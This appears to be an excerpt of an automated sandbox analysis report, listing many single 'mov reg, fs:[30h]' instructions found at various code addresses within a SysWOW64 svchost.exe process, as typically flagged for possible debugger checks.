Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]	2_2_034B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]	2_2_03434690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]	2_2_03434690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0346C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034666B0 mov eax, dword ptr fs:[00000030h]	2_2_034666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]	2_2_03438550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]	2_2_03438550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]	2_2_0346656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]	2_2_0346656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]	2_2_0346656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6500 mov eax, dword ptr fs:[00000030h]	2_2_034C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]	2_2_03504500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]	2_2_0345E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]	2_2_0346E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]	2_2_0346E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034365D0 mov eax, dword ptr fs:[00000030h]	2_2_034365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0346A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0346A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0345E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034325E0 mov eax, dword ptr fs:[00000030h]	2_2_034325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]	2_2_0346C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]	2_2_0346C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03432582 mov eax, dword ptr fs:[00000030h]	2_2_03432582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03432582 mov ecx, dword ptr fs:[00000030h]	2_2_03432582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03464588 mov eax, dword ptr fs:[00000030h]	2_2_03464588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E59C mov eax, dword ptr fs:[00000030h]	2_2_0346E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]	2_2_034B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]	2_2_034B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]	2_2_034B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]	2_2_034545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]	2_2_034545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]	2_2_0346E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EA456 mov eax, dword ptr fs:[00000030h]	2_2_034EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342645D mov eax, dword ptr fs:[00000030h]	2_2_0342645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345245A mov eax, dword ptr fs:[00000030h]	2_2_0345245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BC460 mov ecx, dword ptr fs:[00000030h]	2_2_034BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]	2_2_0345A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]	2_2_0345A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]	2_2_0345A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]	2_2_03468402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]	2_2_03468402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]	2_2_03468402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]	2_2_0342E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]	2_2_0342E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]	2_2_0342E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C427 mov eax, dword ptr fs:[00000030h]	2_2_0342C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]	2_2_034B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A430 mov eax, dword ptr fs:[00000030h]	2_2_0346A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034304E5 mov ecx, dword ptr fs:[00000030h]	2_2_034304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EA49A mov eax, dword ptr fs:[00000030h]	2_2_034EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034364AB mov eax, dword ptr fs:[00000030h]	2_2_034364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034644B0 mov ecx, dword ptr fs:[00000030h]	2_2_034644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_034BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]	2_2_034E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]	2_2_034E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]	2_2_03502B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]	2_2_03502B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]	2_2_03502B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]	2_2_03502B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]	2_2_034C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]	2_2_034C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FAB40 mov eax, dword ptr fs:[00000030h]	2_2_034FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D8B42 mov eax, dword ptr fs:[00000030h]	2_2_034D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428B50 mov eax, dword ptr fs:[00000030h]	2_2_03428B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DEB50 mov eax, dword ptr fs:[00000030h]	2_2_034DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342CB7E mov eax, dword ptr fs:[00000030h]	2_2_0342CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504B00 mov eax, dword ptr fs:[00000030h]	2_2_03504B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]	2_2_034AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]	2_2_0345EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]	2_2_0345EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]	2_2_034F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]	2_2_034F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]	2_2_03450BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]	2_2_03450BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]	2_2_03450BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]	2_2_03430BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]	2_2_03430BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]	2_2_03430BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_034DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]	2_2_03438BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]	2_2_03438BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]	2_2_03438BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345EBFC mov eax, dword ptr fs:[00000030h]	2_2_0345EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_034BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]	2_2_03440BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]	2_2_03440BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_034E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_034E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]	2_2_03436A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]	2_2_03440A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]	2_2_03440A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]	2_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]	2_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]	2_2_0346CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DEA60 mov eax, dword ptr fs:[00000030h]	2_2_034DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]	2_2_034ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]	2_2_034ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BCA11 mov eax, dword ptr fs:[00000030h]	2_2_034BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346CA24 mov eax, dword ptr fs:[00000030h]	2_2_0346CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345EA2E mov eax, dword ptr fs:[00000030h]	2_2_0345EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]	2_2_03454A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]	2_2_03454A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346CA38 mov eax, dword ptr fs:[00000030h]	2_2_0346CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]	2_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]	2_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]	2_2_03486ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430AD0 mov eax, dword ptr fs:[00000030h]	2_2_03430AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]	2_2_03464AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]	2_2_03464AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]	2_2_0346AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]	2_2_0346AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504A80 mov eax, dword ptr fs:[00000030h]	2_2_03504A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03468A90 mov edx, dword ptr fs:[00000030h]	2_2_03468A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]	2_2_03438AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]	2_2_03438AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03486AA4 mov eax, dword ptr fs:[00000030h]	2_2_03486AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B0946 mov eax, dword ptr fs:[00000030h]	2_2_034B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504940 mov eax, dword ptr fs:[00000030h]	2_2_03504940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]	2_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]	2_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]	2_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]	2_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347096E mov edx, dword ptr fs:[00000030h]	2_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]	2_2_0347096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]	2_2_034D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]	2_2_034D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BC97C mov eax, dword ptr fs:[00000030h]	2_2_034BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]	2_2_034AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]	2_2_034AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BC912 mov eax, dword ptr fs:[00000030h]	2_2_034BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]	2_2_03428918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]	2_2_03428918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B892A mov eax, dword ptr fs:[00000030h]	2_2_034B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C892B mov eax, dword ptr fs:[00000030h]	2_2_034C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C69C0 mov eax, dword ptr fs:[00000030h]	2_2_034C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0343A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034649D0 mov eax, dword ptr fs:[00000030h]	2_2_034649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_034FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_034BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]	2_2_034629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]	2_2_034629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]	2_2_034309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]	2_2_034309AD
